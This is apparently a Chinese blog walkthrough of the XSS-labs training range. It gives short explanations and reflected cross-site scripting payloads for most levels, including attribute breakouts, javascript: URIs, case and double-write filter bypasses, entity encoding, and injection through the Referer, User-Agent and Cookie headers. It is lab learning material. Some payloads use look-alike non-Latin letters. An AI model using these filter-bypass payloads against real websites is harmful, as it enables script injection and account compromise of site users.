XSS-labs靶场部分通关

pass-01

get传name参数显示在页面上,说明插入到了html里头

构造payload

level1.php?name=<script>alert(1)</script>

pass-02

直接上payload,没有成功

查看源码,发现被做了转义,但还有一个没有被转义

可以进行闭合

payload

"><script>alert(1)</script><"

pass-03

比起上一关,两处都做了转义

可以用onfocus事件,配合javascript伪协议进行绕过

'οnfοcus=javascript:alert(1)'

pass-04

双引号闭合" οnfοcus=javascript:alert(1) "

pass-05

被替换为了o_n

添加一个标签闭合前面标签

"> <a href=javascript:alert(1)>a</a> <"

pass-06

查看源码,过滤了很多,但是可以使用大小写绕过

"> <a hRef=javascript:alert(1)>1</a> <"

pass-07

使用双写绕过

"> <a hrehreff=javasscriptcript:alert(1)>1</a> <"

pass-08

将payload:javascript:alert()进行unicode编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

pass-09

检测了传入的值有没有http://

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

pass-10

查看源码发现有隐藏的传参方式

?t_sort=" οnfοcus=javascript:alert() type="text

pass-11

查看源码,使用referer参数

bp抓包添加referer

Referer: " οnfοcus=javascript:alert() type="text

pass-12

ua头

抓包改ua头

" οnfοcus=javascript:alert() type="text

成功

pass-13

cookie

抓包改cookie

" οnclick=alert() type="text 

pass-16

使用svg标签

?keyword=<svg%0Aοnlοad=alert(1)>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值